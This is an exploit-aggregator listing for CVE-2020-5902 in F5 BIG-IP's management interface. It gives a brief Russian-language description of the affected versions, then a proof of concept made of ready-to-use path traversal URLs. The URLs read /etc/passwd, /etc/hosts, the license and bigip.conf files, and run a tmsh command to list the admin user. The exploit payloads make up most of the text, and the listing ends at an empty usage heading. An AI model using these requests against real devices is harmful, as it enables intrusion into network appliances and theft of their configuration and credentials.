Sploitus

Exploit for CVE-2020-5902

kitploit · 2026-09-04

Exploit Code

MARKDOWN38 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AMITLTTWO-CVE-2020-5902
# CVE-2020-5902

В BIG-IP версий 15.0.0–15.1.0.3, 14.1.0–14.1.2.5, 13.1.0–13.1.3.3, 12.1.0–12.1.5.1 и 11.6.1–11.6.5.1 в Traffic Management User Interface (TMUI), также называемом утилитой конфигурации, существует уязвимость удаленного выполнения кода (RCE) на нераскрытых страницах.

# Доказательство концепции

root@kitploit:~
    
    
    https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    

root@kitploit:~
    
    
    https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
    

root@kitploit:~
    
    
    https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
    

root@kitploit:~
    
    
    https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    

root@kitploit:~
    
    
    https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
    

# Использование и установка